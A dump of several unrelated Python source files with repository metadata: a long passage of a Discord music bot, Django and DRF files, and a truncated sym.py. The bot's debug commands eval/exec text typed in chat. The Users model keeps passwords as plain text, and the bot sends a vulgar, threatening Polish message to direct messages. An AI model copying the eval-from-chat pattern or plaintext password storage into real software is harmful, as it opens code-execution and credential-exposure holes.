    # TODO: ignore person if they're deaf or take them out of the list or something?
    # Currently is recounted if they vote, deafen, then vote
    # Eligible voters: channel members minus deafened users, the owner and the bot.
    num_voice = sum(1 for m in voice_channel.voice_members if not (
        m.deaf or m.self_deaf or m.id in [self.config.owner_id, self.user.id]))
    num_skips = player.skip_state.add_skipper(author.id, message)
    # Required votes is the lower of the absolute count and the configured ratio.
    skips_remaining = min(
        self.config.skips_required,
        math.ceil(self.config.skip_ratio_required / (1 / num_voice))  # Number of skips from config ratio
    ) - num_skips
    if skips_remaining <= 0:
        player.skip()  # check autopause stuff here
        return Response(
            'your skip for **{}** was acknowledged.'
            '\nThe vote to skip has been passed.{}'.format(
                player.current_entry.title,
                ' Next song coming up!' if player.playlist.peek() else ''
            ),
            reply=True,
            delete_after=20
        )
    else:
        # TODO: When a song gets skipped, delete the old x needed to skip messages
        return Response(
            'your skip for **{}** was acknowledged.'
            '\n**{}** more {} required to vote to skip this song.'.format(
                player.current_entry.title,
                skips_remaining,
                'person is' if skips_remaining == 1 else 'people are'
            ),
            reply=True,
            delete_after=20
        )
async def cmd_volume(self, message, player, new_volume=None):
    """
    Usage:
        {command_prefix}volume (+/-)[volume]
    Sets the playback volume. Accepted values are from 1 to 100.
    Putting + or - before the volume will make the volume change relative to the current volume.
    """
    # No argument: just report the current volume.
    if not new_volume:
        return Response('Current volume: `%s%%`' % int(player.volume * 100), reply=True, delete_after=20)
    relative = False
    if new_volume[0] in '+-':
        relative = True
    try:
        new_volume = int(new_volume)  # int() keeps the sign, so "-10" -> -10
    except ValueError:
        raise exceptions.CommandError('{} is not a valid number'.format(new_volume), expire_in=20)
    vol_change = None
    if relative:
        # Relative change: offset from the current volume (as a percentage).
        vol_change = new_volume
        new_volume += (player.volume * 100)
    old_volume = int(player.volume * 100)
    if 0 < new_volume <= 100:
        player.volume = new_volume / 100.0
        return Response('updated volume from %d to %d' % (old_volume, new_volume), reply=True, delete_after=20)
    else:
        if relative:
            raise exceptions.CommandError(
                'Unreasonable volume change provided: {}{:+} -> {}%. Provide a change between {} and {:+}.'.format(
                    old_volume, vol_change, old_volume + vol_change, 1 - old_volume, 100 - old_volume), expire_in=20)
        else:
            raise exceptions.CommandError(
                'Unreasonable volume provided: {}%. Provide a value between 1 and 100.'.format(new_volume), expire_in=20)
async def cmd_kolejka(self, channel, player):
    """
    Usage:
        {command_prefix}kolejka
    Prints the current song queue.
    """
    lines = []
    unlisted = 0
    # Worst-case width of the "... and N more" suffix, used for the length budget.
    andmoretext = '* ... and %s more*' % ('x' * len(player.playlist.entries))
    if player.current_entry:
        # TODO: Fix timedelta garbage with util function
        song_progress = ftimedelta(timedelta(seconds=player.progress))
        song_total = ftimedelta(timedelta(seconds=player.current_entry.duration))
        prog_str = '`[%s/%s]`' % (song_progress, song_total)
        if player.current_entry.meta.get('channel', False) and player.current_entry.meta.get('author', False):
            lines.append("Currently Playing: **%s** added by **%s** %s\n" % (
                player.current_entry.title, player.current_entry.meta['author'].name, prog_str))
        else:
            lines.append("Now Playing: **%s** %s\n" % (player.current_entry.title, prog_str))
    for i, item in enumerate(player.playlist, 1):
        if item.meta.get('channel', False) and item.meta.get('author', False):
            nextline = '`{}.` **{}** added by **{}**'.format(i, item.title, item.meta['author'].name).strip()
        else:
            nextline = '`{}.` **{}**'.format(i, item.title).strip()
        currentlinesum = sum(len(x) + 1 for x in lines)  # +1 is for newline char
        # Once the message would exceed Discord's limit, count the rest as unlisted.
        if currentlinesum + len(nextline) + len(andmoretext) > DISCORD_MSG_CHAR_LIMIT:
            # NOTE(review): this inner condition is always truthy (a positive sum),
            # so every overflowing entry is counted — likely it was meant to
            # compare against DISCORD_MSG_CHAR_LIMIT. Behavior kept as-is.
            if currentlinesum + len(andmoretext):
                unlisted += 1
                continue
        lines.append(nextline)
    if unlisted:
        lines.append('\n*... and %s more*' % unlisted)
    if not lines:
        lines.append(
            'There are no songs queued! Queue something with {}play.'.format(self.config.command_prefix))
    message = '\n'.join(lines)
    return Response(message, delete_after=30)
async def cmd_clean(self, message, channel, server, author, search_range=50):
    """
    Usage:
        {command_prefix}clean [range]
    Removes up to [range] messages the bot has posted in chat. Default: 50, Max: 1000
    """
    try:
        float(search_range)  # lazy check
        # NOTE(review): int() still raises for float strings like "50.5";
        # the bare except below turns that into the error response.
        search_range = min(int(search_range), 1000)
    except:
        return Response("enter a number.  NUMBER.  That means digits.  `15`.  Etc.", reply=True, delete_after=8)
    await self.safe_delete_message(message, quiet=True)
    def is_possible_command_invoke(entry):
        # A message is a command invoke if it starts with our prefix and the
        # character after the prefix is not whitespace.
        valid_call = any(
            entry.content.startswith(prefix) for prefix in [self.config.command_prefix])  # can be expanded
        return valid_call and not entry.content[1:2].isspace()
    delete_invokes = True
    # Moderators (manage_messages) and the owner may delete anyone's invokes.
    delete_all = channel.permissions_for(author).manage_messages or self.config.owner_id == author.id
    def check(message):
        if is_possible_command_invoke(message) and delete_invokes:
            return delete_all or message.author == author
        return message.author == self.user
    if self.user.bot:
        # Bot accounts with manage_messages can bulk-purge in one API call.
        if channel.permissions_for(server.me).manage_messages:
            deleted = await self.purge_from(channel, check=check, limit=search_range, before=message)
            return Response('Cleaned up {} message{}.'.format(len(deleted), 's' * bool(deleted)), delete_after=15)
    # Fallback: walk the history and delete one message at a time (rate-limited).
    deleted = 0
    async for entry in self.logs_from(channel, search_range, before=message):
        if entry == self.server_specific_data[channel.server]['last_np_msg']:
            continue
        if entry.author == self.user:
            await self.safe_delete_message(entry)
            deleted += 1
            await asyncio.sleep(0.21)
        if is_possible_command_invoke(entry) and delete_invokes:
            if delete_all or entry.author == author:
                try:
                    await self.delete_message(entry)
                    await asyncio.sleep(0.21)
                    deleted += 1
                except discord.Forbidden:
                    # Lost permission mid-run: stop trying to delete invokes.
                    delete_invokes = False
                except discord.HTTPException:
                    pass
    return Response('Cleaned up {} message{}.'.format(deleted, 's' * bool(deleted)), delete_after=6)
async def cmd_pldump(self, channel, song_url):
    """
    Usage:
        {command_prefix}pldump url
    Dumps the individual urls of a playlist
    """
    try:
        info = await self.downloader.extract_info(self.loop, song_url.strip('<>'), download=False, process=False)
    except Exception as e:
        raise exceptions.CommandError("Could not extract info from input url\n%s\n" % e, expire_in=25)
    if not info:
        raise exceptions.CommandError("Could not extract info from input url, no data.", expire_in=25)
    if not info.get('entries', None):
        # TODO: Retarded playlist checking
        # set(url, webpageurl).difference(set(url))
        if info.get('url', None) != info.get('webpage_url', info.get('url', None)):
            raise exceptions.CommandError("This does not seem to be a playlist.", expire_in=25)
        else:
            # BUG FIX: this used to recurse on info.get('') which is always
            # None, guaranteeing an extraction error. Recurse on the resolved
            # media url instead, but bail out if it would loop on itself.
            resolved = info.get('url', None)
            if not resolved or resolved == song_url.strip('<>'):
                raise exceptions.CommandError("This does not seem to be a playlist.", expire_in=25)
            return await self.cmd_pldump(channel, resolved)
    # Per-extractor url builders; entries from flat extraction only carry ids.
    linegens = defaultdict(lambda: None, **{
        "youtube": lambda d: 'https://www.youtube.com/watch?v=%s' % d['id'],
        "soundcloud": lambda d: d['url'],
        "bandcamp": lambda d: d['url']
    })
    exfunc = linegens[info['extractor'].split(':')[0]]
    if not exfunc:
        raise exceptions.CommandError("Could not extract info from input url, unsupported playlist type.", expire_in=25)
    # Build the dump in memory and upload it as a text attachment.
    with BytesIO() as fcontent:
        for item in info['entries']:
            fcontent.write(exfunc(item).encode('utf8') + b'\n')
        fcontent.seek(0)
        await self.send_file(channel, fcontent, filename='playlist.txt', content="Here's the url dump for <%s>" % song_url)
    return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
async def cmd_listids(self, server, author, leftover_args, cat='all'):
    """
    Usage:
        {command_prefix}listids [categories]
    Lists the ids for various things. Categories are:
        all, users, roles, channels
    """
    cats = ['channels', 'roles', 'users']
    if cat not in cats and cat != 'all':
        return Response(
            "Valid categories: " + ' '.join(['`%s`' % c for c in cats]),
            reply=True,
            delete_after=25
        )
    if cat == 'all':
        requested_cats = cats
    else:
        # Allow extra comma-separated categories after the first argument.
        requested_cats = [cat] + [c.strip(',') for c in leftover_args]
    data = ['Your ID: %s' % author.id]
    for cur_cat in requested_cats:
        rawudata = None
        if cur_cat == 'users':
            data.append("\nUser IDs:")
            rawudata = ['%s #%s: %s' % (m.name, m.discriminator, m.id) for m in server.members]
        elif cur_cat == 'roles':
            data.append("\nRole IDs:")
            rawudata = ['%s: %s' % (r.name, r.id) for r in server.roles]
        elif cur_cat == 'channels':
            data.append("\nText Channel IDs:")
            tchans = [c for c in server.channels if c.type == discord.ChannelType.text]
            rawudata = ['%s: %s' % (c.name, c.id) for c in tchans]
            rawudata.append("\nVoice Channel IDs:")
            vchans = [c for c in server.channels if c.type == discord.ChannelType.voice]
            rawudata.extend('%s: %s' % (c.name, c.id) for c in vchans)
        if rawudata:
            data.extend(rawudata)
    # DM the list as a text file attachment rather than flooding the channel.
    with BytesIO() as sdata:
        sdata.writelines(d.encode('utf8') + b'\n' for d in data)
        sdata.seek(0)
        # TODO: Fix naming (Discord20API-ids.txt)
        await self.send_file(author, sdata, filename='%s-ids-%s.txt' % (server.name.replace(' ', '_'), cat))
    return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
async def cmd_perms(self, author, channel, server, permissions):
    """
    Usage:
        {command_prefix}perms
    Sends the user a list of their permissions.
    """
    header = 'Command permissions in %s\n' % server.name
    body = []
    for name, value in permissions.__dict__.items():
        # Skip the raw user list and any empty permission sets.
        if name in ['user_list'] or value == set():
            continue
        body.append("%s: %s" % (name, value))
    # Wrap the permission lines in a code block, DM'd to the author.
    await self.send_message(author, '\n'.join([header, '```', *body, '```']))
    return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
@owner_only
async def cmd_setname(self, leftover_args, name):
    """
    Usage:
        {command_prefix}setname name
    Changes the bot's username.
    Note: This operation is limited by discord to twice per hour.
    """
    # Rejoin the remaining words so multi-word names work.
    full_name = ' '.join([name, *leftover_args])
    try:
        await self.edit_profile(username=full_name)
    except discord.HTTPException:
        # Discord rejects the request once the rename rate limit is hit.
        raise exceptions.CommandError(
            "Failed to change name. Did you change names too many times? "
            "Remember name changes are limited to twice per hour.")
    except Exception as e:
        raise exceptions.CommandError(e, expire_in=20)
    return Response("\N{OK HAND SIGN}", delete_after=20)
async def cmd_setnick(self, server, channel, leftover_args, nick):
    """
    Usage:
        {command_prefix}setnick nick
    Changes the bot's nickname.
    """
    # Guard clause: fail fast when the bot lacks the change_nickname permission.
    if not channel.permissions_for(server.me).change_nickname:
        raise exceptions.CommandError("Unable to change nickname: no permission.")
    # Rejoin the remaining words so multi-word nicknames work.
    full_nick = ' '.join([nick, *leftover_args])
    try:
        await self.change_nickname(server.me, full_nick)
    except Exception as e:
        raise exceptions.CommandError(e, expire_in=20)
    return Response("\N{OK HAND SIGN}", delete_after=20)
@owner_only
async def cmd_setavatar(self, message, url=None):
    """
    Usage:
        {command_prefix}setavatar [url]
    Changes the bot's avatar.
    Attaching a file and leaving the url parameter blank also works.
    """
    # Prefer an attached file over a url argument.
    if message.attachments:
        thing = message.attachments[0]['url']
    elif url:
        thing = url.strip('<>')
    else:
        raise exceptions.CommandError("You must provide a URL or attach a file.", expire_in=20)
    try:
        # NOTE(review): aiohttp.Timeout is the old (pre-3.x) timeout context —
        # confirm the pinned aiohttp version still provides it.
        with aiohttp.Timeout(10):
            async with self.aiosession.get(thing) as res:
                await self.edit_profile(avatar=await res.read())
    except Exception as e:
        raise exceptions.CommandError("Unable to change avatar: {}".format(e), expire_in=20)
    return Response("\N{OK HAND SIGN}", delete_after=20)
async def cmd_disconnect(self, server):
    """Disconnect the bot's voice client from *server* and acknowledge."""
    ack = Response("\N{DASH SYMBOL}", delete_after=20)
    await self.disconnect_voice_client(server)
    return ack
async def cmd_restart(self, channel):
    """Wave goodbye, drop all voice clients, then signal the runner to restart."""
    await self.safe_send_message(channel, "\N{WAVING HAND SIGN}")
    await self.disconnect_all_voice_clients()
    # The surrounding run loop catches this and restarts the bot.
    raise exceptions.RestartSignal()
async def cmd_spierdalaj(self, channel):
    """Wave goodbye, drop all voice clients, then signal the runner to shut down."""
    await self.safe_send_message(channel, "\N{WAVING HAND SIGN}")
    await self.disconnect_all_voice_clients()
    # The surrounding run loop catches this and terminates the bot.
    raise exceptions.TerminateSignal()
@dev_only
async def cmd_breakpoint(self, message):
    """Dev hook: log a critical marker (a debugger breakpoint can be set here)."""
    log.critical("Activating debug breakpoint")
    return
@dev_only
async def cmd_objgraph(self, channel, func='most_common_types()'):
    """Dev hook: run an objgraph inspection and return its output.

    func selects the report: 'growth', 'leaks', 'leakstats', or any raw
    objgraph expression (evaluated — acceptable only because @dev_only
    restricts this command to trusted developers).
    """
    import objgraph
    await self.send_typing(channel)
    if func == 'growth':
        f = StringIO()
        objgraph.show_growth(limit=10, file=f)
        f.seek(0)
        data = f.read()
        f.close()
    elif func == 'leaks':
        f = StringIO()
        objgraph.show_most_common_types(objects=objgraph.get_leaking_objects(), file=f)
        f.seek(0)
        data = f.read()
        f.close()
    elif func == 'leakstats':
        data = objgraph.typestats(objects=objgraph.get_leaking_objects())
    else:
        # SECURITY: eval of caller-supplied text — safe only under @dev_only.
        data = eval('objgraph.' + func)
    return Response(data, codeblock='py')
@dev_only
async def cmd_debug(self, message, _player, *, data):
    """Dev hook: eval/exec arbitrary code from chat and return the result.

    SECURITY: runs untrusted-looking input on purpose — acceptable only
    because @dev_only restricts this command to trusted developers.
    """
    codeblock = "```py\n{}\n```"
    result = None
    # Strip a surrounding ```...``` code fence, if present.
    if data.startswith('```') and data.endswith('```'):
        data = '\n'.join(data.rstrip('`\n').split('\n')[1:])
    code = data.strip('` \n')
    try:
        # Try as an expression first, fall back to statements.
        result = eval(code)
    except:
        try:
            exec(code)
        except Exception as e:
            traceback.print_exc(chain=False)
            return Response("{}: {}".format(type(e).__name__, e))
    # Await a coroutine result so `await`-style expressions work too.
    if asyncio.iscoroutine(result):
        result = await result
    return Response(codeblock.format(result))
async def on_message(self, message):
    """Central command dispatcher: parse a message, resolve the matching
    cmd_* handler, build its kwargs by introspecting its signature, run it,
    and send/expire the Response it returns."""
    await self.wait_until_ready()
    message_content = message.content.strip()
    if not message_content.startswith(self.config.command_prefix):
        return
    if message.author == self.user:
        log.warning("Ignoring command from myself ({})".format(message.content))
        return
    if self.config.bound_channels and message.channel.id not in self.config.bound_channels and not message.channel.is_private:
        return  # if I want to log this I just move it under the prefix check
    command, *args = message_content.split(' ')  # Uh, doesn't this break prefixes with spaces in them (it doesn't, config parser already breaks them)
    command = command[len(self.config.command_prefix):].lower().strip()
    # Commands are methods named cmd_<command>; unknown commands are ignored.
    handler = getattr(self, 'cmd_' + command, None)
    if not handler:
        return
    if message.channel.is_private:
        # Only the owner's 'wejdz' command is allowed in DMs.
        if not (message.author.id == self.config.owner_id and command == 'wejdz'):
            await self.send_message(message.channel, 'NIE PISZ NA PRIV BO CI WYKURWIE.')
            return
    if message.author.id in self.blacklist and message.author.id != self.config.owner_id:
        log.warning("User blacklisted: {0.id}/{0!s} ({1})".format(message.author, command))
        return
    else:
        log.info("{0.id}/{0!s}: {1}".format(message.author, message_content.replace('\n', '\n... ')))
    user_permissions = self.permissions.for_user(message.author)
    # Inspect the handler's signature to decide which kwargs to inject.
    argspec = inspect.signature(handler)
    params = argspec.parameters.copy()
    sentmsg = response = None
    # noinspection PyBroadException
    try:
        if user_permissions.ignore_non_voice and command in user_permissions.ignore_non_voice:
            await self._check_ignore_non_voice(message)
        # Inject well-known context objects for any parameter the handler declares.
        handler_kwargs = {}
        if params.pop('message', None):
            handler_kwargs['message'] = message
        if params.pop('channel', None):
            handler_kwargs['channel'] = message.channel
        if params.pop('author', None):
            handler_kwargs['author'] = message.author
        if params.pop('server', None):
            handler_kwargs['server'] = message.server
        if params.pop('player', None):
            handler_kwargs['player'] = await self.get_player(message.channel)
        if params.pop('_player', None):
            handler_kwargs['_player'] = self.get_player_in(message.server)
        if params.pop('permissions', None):
            handler_kwargs['permissions'] = user_permissions
        if params.pop('user_mentions', None):
            handler_kwargs['user_mentions'] = list(map(message.server.get_member, message.raw_mentions))
        if params.pop('channel_mentions', None):
            handler_kwargs['channel_mentions'] = list(map(message.server.get_channel, message.raw_channel_mentions))
        if params.pop('voice_channel', None):
            handler_kwargs['voice_channel'] = message.server.me.voice_channel
        if params.pop('leftover_args', None):
            handler_kwargs['leftover_args'] = args
        args_expected = []
        for key, param in list(params.items()):
            # parse (*args) as a list of args
            if param.kind == param.VAR_POSITIONAL:
                handler_kwargs[key] = args
                params.pop(key)
                continue
            # parse (*, args) as args rejoined as a string
            # multiple of these arguments will have the same value
            if param.kind == param.KEYWORD_ONLY and param.default == param.empty:
                handler_kwargs[key] = ' '.join(args)
                params.pop(key)
                continue
            doc_key = '[{}={}]'.format(key, param.default) if param.default is not param.empty else key
            args_expected.append(doc_key)
            # Ignore keyword args with default values when the command had no arguments
            if not args and param.default is not param.empty:
                params.pop(key)
                continue
            # Assign given values to positional arguments
            if args:
                arg_value = args.pop(0)
                handler_kwargs[key] = arg_value
                params.pop(key)
        # Enforce per-group command whitelist/blacklist (owner bypasses both).
        if message.author.id != self.config.owner_id:
            if user_permissions.command_whitelist and command not in user_permissions.command_whitelist:
                raise exceptions.PermissionsError(
                    "This command is not enabled for your group ({}).".format(user_permissions.name),
                    expire_in=20)
            elif user_permissions.command_blacklist and command in user_permissions.command_blacklist:
                raise exceptions.PermissionsError(
                    "This command is disabled for your group ({}).".format(user_permissions.name),
                    expire_in=20)
        # Invalid usage, return docstring
        if params:
            docs = getattr(handler, '__doc__', None)
            if not docs:
                docs = 'Usage: {}{} {}'.format(
                    self.config.command_prefix,
                    command,
                    ' '.join(args_expected)
                )
            docs = dedent(docs)
            await self.safe_send_message(
                message.channel,
                '```\n{}\n```'.format(docs.format(command_prefix=self.config.command_prefix)),
                expire_in=60
            )
            return
        response = await handler(**handler_kwargs)
        if response and isinstance(response, Response):
            content = response.content
            if response.reply:
                content = '{}, {}'.format(message.author.mention, content)
            sentmsg = await self.safe_send_message(
                message.channel, content,
                expire_in=response.delete_after if self.config.delete_messages else 0,
                also_delete=message if self.config.delete_invoking else None
            )
    except (exceptions.CommandError, exceptions.HelpfulError, exceptions.ExtractionError) as e:
        log.error("Error in {0}: {1.__class__.__name__}: {1.message}".format(command, e), exc_info=True)
        expirein = e.expire_in if self.config.delete_messages else None
        alsodelete = message if self.config.delete_invoking else None
        await self.safe_send_message(
            message.channel,
            '```\n{}\n```'.format(e.message),
            expire_in=expirein,
            also_delete=alsodelete
        )
    except exceptions.Signal:
        # Restart/Terminate signals must propagate to the run loop.
        raise
    except Exception:
        log.error("Exception in on_message", exc_info=True)
        if self.config.debug_mode:
            await self.safe_send_message(message.channel, '```\n{}\n```'.format(traceback.format_exc()))
    finally:
        # If the command produced no output, optionally delete the invoking message.
        if not sentmsg and not response and self.config.delete_invoking:
            await asyncio.sleep(5)
            await self.safe_delete_message(message, quiet=True)
async def on_voice_state_update(self, before, after):
    """Track joins/leaves in the bot's voice channel and auto-pause/resume
    the player when the channel empties or repopulates."""
    if not self.init_ok:
        return  # Ignore stuff before ready
    state = VoiceStateUpdate(before, after)
    if state.broken:
        log.voicedebug("Broken voice state update")
        return
    if state.resuming:
        log.debug("Resumed voice connection to {0.server.name}/{0.name}".format(state.voice_channel))
    if not state.changes:
        log.voicedebug("Empty voice state update, likely a session id change")
        return  # Session id change, pointless event
    ################################
    log.voicedebug("Voice state update for {mem.id}/{mem!s} on {ser.name}/{vch.name} -> {dif}".format(
        mem = state.member,
        ser = state.server,
        vch = state.voice_channel,
        dif = state.changes
    ))
    if not state.is_about_my_voice_channel:
        return  # Irrelevant channel
    if state.joining or state.leaving:
        log.info("{0.id}/{0!s} has {1} {2}/{3}".format(
            state.member,
            'joined' if state.joining else 'left',
            state.server,
            state.my_voice_channel
        ))
    if not self.config.auto_pause:
        return
    autopause_msg = "{state} in {channel.server.name}/{channel.name} {reason}"
    auto_paused = self.server_specific_data[after.server]['auto_paused']
    player = await self.get_player(state.my_voice_channel)
    # Someone joined an otherwise-empty channel while we were playing:
    # pause until a listener is actually present.
    if state.joining and state.empty() and player.is_playing:
        log.info(autopause_msg.format(
            state = "Pausing",
            channel = state.my_voice_channel,
            reason = "(joining empty channel)"
        ).strip())
        self.server_specific_data[after.server]['auto_paused'] = True
        player.pause()
        return
    if not state.is_about_me:
        if not state.empty(old_channel=state.leaving):
            # Listeners present again: undo a previous auto-pause.
            if auto_paused and player.is_paused:
                log.info(autopause_msg.format(
                    state = "Unpausing",
                    channel = state.my_voice_channel,
                    reason = ""
                ).strip())
                self.server_specific_data[after.server]['auto_paused'] = False
                player.resume()
        else:
            # Channel emptied out: auto-pause until someone returns.
            if not auto_paused and player.is_playing:
                log.info(autopause_msg.format(
                    state = "Pausing",
                    channel = state.my_voice_channel,
                    reason = "(empty channel)"
                ).strip())
                self.server_specific_data[after.server]['auto_paused'] = True
                player.pause()
async def on_server_update(self, before:discord.Server, after:discord.Server):
    """Reconnect the voice client when a server migrates to another region."""
    # A region change invalidates the current voice endpoint.
    if before.region == after.region:
        return
    log.warning("Server \"%s\" changed regions: %s -> %s" % (after.name, before.region, after.region))
    await self.reconnect_voice_client(after)
async def on_server_join(self, server:discord.Server):
    """On joining a server: post a mute-me notice on known servers (selfbot
    mode only) and create the server's data folder."""
    log.info("Bot has been joined server: {}".format(server.name))
    if not self.user.bot:
        alertmsg = "<@{uid}> Hi I'm a musicbot please mute me."
        # Hard-coded server/channel/user ids inherited from upstream MusicBot.
        if server.id == "81384788765712384" and not server.unavailable:  # Discord API
            playground = server.get_channel("94831883505905664") or discord.utils.get(server.channels, name='playground') or server
            await self.safe_send_message(playground, alertmsg.format(uid="98295630480314368"))  # fake abal
        elif server.id == "129489631539494912" and not server.unavailable:  # Rhino Bot Help
            bot_testing = server.get_channel("134771894292316160") or discord.utils.get(server.channels, name='bot-testing') or server
            await self.safe_send_message(bot_testing, alertmsg.format(uid="98295630480314368"))  # also fake abal
    log.debug("Creating data folder for server %s", server.id)
    pathlib.Path('data/%s/' % server.id).mkdir(exist_ok=True)
async def on_server_remove(self, server: discord.Server):
    """On leaving a server: log it and kill that server's player, if any."""
    log.info("Bot has been removed from server: {}".format(server.name))
    log.debug('Updated server list:')
    # Idiom fix: a plain loop for side effects — the original used a list
    # comprehension purely to call log.debug, building a throwaway list.
    for s in self.servers:
        log.debug(' - ' + s.name)
    if server.id in self.players:
        self.players.pop(server.id).kill()
async def on_server_available(self, server: discord.Server):
    """Resume a player that was auto-paused while its server was unavailable."""
    if not self.init_ok:
        return  # Ignore pre-ready events
    log.debug("Server \"{}\" has become available.".format(server.name))
    player = self.get_player_in(server)
    # Only act on a player we paused ourselves due to unavailability.
    if not (player and player.is_paused):
        return
    if self.server_specific_data[server]['availability_paused']:
        log.debug("Resuming player in \"{}\" due to availability.".format(server.name))
        self.server_specific_data[server]['availability_paused'] = False
        player.resume()
async def on_server_unavailable(self, server: discord.Server):
    """Pause a playing player when its server drops to unavailable."""
    log.debug("Server \"{}\" has become unavailable.".format(server.name))
    player = self.get_player_in(server)
    # Remember that we paused it, so on_server_available can resume it.
    if player and player.is_playing:
        log.debug("Pausing player in \"{}\" due to unavailability.".format(server.name))
        self.server_specific_data[server]['availability_paused'] = True
        player.pause()
|
[
"noreply@github.com"
] |
noreply@github.com
|
19ed9b12b8f92747a7d5730dd8e9cfa7b98d1e12
|
6ed0b6576857efc67901790dbf926c558d440bd7
|
/backend/manage.py
|
a6ec92e1ac1e5abe024afe74dc330d67aa5ff4bc
|
[] |
no_license
|
crowdbotics-apps/test-aline-0721-dev-7964
|
dae692cc48e757e0275c853ae975d90de97a1657
|
3104874e1b83a8863942ee6a10c2a8aceb6e52f5
|
refs/heads/master
| 2022-11-19T23:22:20.735744
| 2020-07-22T15:50:19
| 2020-07-22T15:50:19
| 281,442,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 644
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run Django's command-line utility for administrative tasks."""
    # Point Django at this project's settings before any framework import.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_aline_0721_dev_7964.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)
if __name__ == "__main__":
    main()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
b80ac7ea9d7671918a54c63f69fe2187f54ccda5
|
061cc9968cac30ca8c5aff4537c4332ae6ca2600
|
/MyCmdb/Users/models.py
|
46cebfa4541ab8c771c5ca2c7655830c658532c7
|
[] |
no_license
|
zhubingbi/-Company-script
|
14ebf83904e54e829ad1ad233d3faa1a8df3acd5
|
b5306e5f7214a1a887d65020f48afc88067645ff
|
refs/heads/master
| 2020-12-02T06:38:08.071754
| 2017-11-15T02:46:11
| 2017-11-15T02:46:11
| 96,868,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 777
|
py
|
# coding=utf-8
from django.db import models
# Create your models here.
class Users(models.Model):
    """User account record: credentials, contact details, avatar and role flag."""
    # Username (verbose_name: 用户名).
    user = models.CharField(max_length=32, verbose_name='用户名')
    # Password (verbose_name: 用户密码).
    # NOTE(review): stored as a plain CharField — looks like plaintext storage;
    # confirm hashing happens elsewhere before save.
    password = models.CharField(max_length=32, verbose_name='用户密码')
    # Registration phone number (verbose_name: 注册电话).
    phone = models.CharField(max_length=32, verbose_name='注册电话')
    # Birthday, stored as free text (verbose_name: 用户生日).
    birthday = models.CharField(max_length=32, verbose_name='用户生日')
    # Optional email address (verbose_name: 邮箱).
    email = models.EmailField(blank=True, null=True, verbose_name='邮箱')
    # Business group name (verbose_name: 用户业务分组).
    groups = models.CharField(max_length=32, null=True, verbose_name='用户业务分组')
    # Avatar image uploaded to 'uploadImg' (verbose_name: 用户头像).
    photo = models.ImageField(upload_to='uploadImg', blank=True, null=True, verbose_name='用户头像')
    # Admin flag stored as text (verbose_name: 是否具有管理员权限).
    isadmin = models.CharField(max_length=32, blank=True, null=True, verbose_name='是否具有管理员权限')
|
[
"zhubingbi@gmail.com"
] |
zhubingbi@gmail.com
|
a1b9c909d2e60fb563ed2c58c3bf28e228f2e771
|
751691a21ed1d8c69c35f3cd9b9fd395dc5c1aa8
|
/{{cookiecutter.项目名称}}/{{cookiecutter.初始化app名称}}/custom_viewset.py
|
10b0164eb8f5f4fa01443e26d36608d2830e48cc
|
[] |
no_license
|
mtianyan/cookiecutter-drf-mtianyan
|
5899847f46e853a0ec5be9bcbf9e7294ce2b70cd
|
b1298f6c5b20149db4589ce127b2e6e0392552b6
|
refs/heads/master
| 2022-12-28T18:26:57.969693
| 2020-10-10T08:29:08
| 2020-10-10T08:29:08
| 275,175,974
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,619
|
py
|
from rest_framework import viewsets, status
from rest_framework.response import Response
from utils import change_key
class CustomViewSet(viewsets.ModelViewSet):
    """ModelViewSet variant that wraps responses in a {'code': 200, ...} envelope."""
    def retrieve(self, request, *args, **kwargs):
        """Return one object, with any 'status' field coerced to a string."""
        instance = self.get_object()
        serializer = self.get_serializer(instance)
        res = serializer.data
        if "status" in res.keys():
            res["status"] = str(res["status"])
        return Response({
            "code": 200,
            "data": res
        })
    def create(self, request, *args, **kwargs):
        """Validate and create an object; reply with only the code envelope."""
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        self.perform_create(serializer)
        headers = self.get_success_headers(serializer.data)
        return Response({'code': 200}, status=status.HTTP_201_CREATED, headers=headers)
    def put(self, request, *args, **kwargs):
        """Partial update: save only the non-pk fields present in the payload.

        NOTE(review): bypasses serializer validation by instantiating the
        model directly from request.data — confirm that is intentional.
        """
        change_key(request)
        # Every payload key except the primary key is treated as a field to update.
        update_fields = [one for one in request.data.keys() if one != self.serializer_class.Meta.model._meta.pk.name]
        self.serializer_class.Meta.model(**request.data).save(update_fields=update_fields)
        return Response({'code': 200, 'msg': '修改成功'})
    # def destroy(self, request, *args, **kwargs):
    #     instance = self.get_object()
    #     self.perform_destroy(instance)
    #     return Response({'code': 200}, status=status.HTTP_200_OK)
    def destroy(self, request, *args, **kwargs):
        """Bulk delete: pk may be a comma-separated list of ids."""
        ids = kwargs["pk"].split(",")
        self.serializer_class.Meta.model.objects.filter(pk__in=ids).delete()
        return Response({
            "code": 200
        })
|
[
"1147727180@qq.com"
] |
1147727180@qq.com
|
44a6e5f1f5fda5f40b242e469cc4314b106c8306
|
e6b969b7c50de5ae61c4b76ec31a982d16523e46
|
/sym.py
|
3f88fe9fcc929640105de765ca5654c69c9dd65f
|
[] |
no_license
|
dlovemore/parle
|
7d52dc76716f3f8a5f085aa26277b2c52b98b098
|
e949c743b2760079eb3c3eb67198e69562521d20
|
refs/heads/master
| 2021-01-03T07:04:09.060552
| 2020-10-20T13:01:59
| 2020-10-20T13:01:59
| 239,972,201
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,418
|
py
|
class Base:
    """Root of the symbolic-expression hierarchy: a thin holder for positional args."""

    def __init__(self, *args):
        self._args = args

    @property
    def args(self):
        """The node's child tuple (operator tag plus operands for subclasses)."""
        return self._args

    @args.setter
    def args(self, value):
        self._args = value

    def __repr__(self):
        # Render as a constructor call; list-repr minus brackets gives "a, b, c".
        inner = repr(list(self.args))[1:-1]
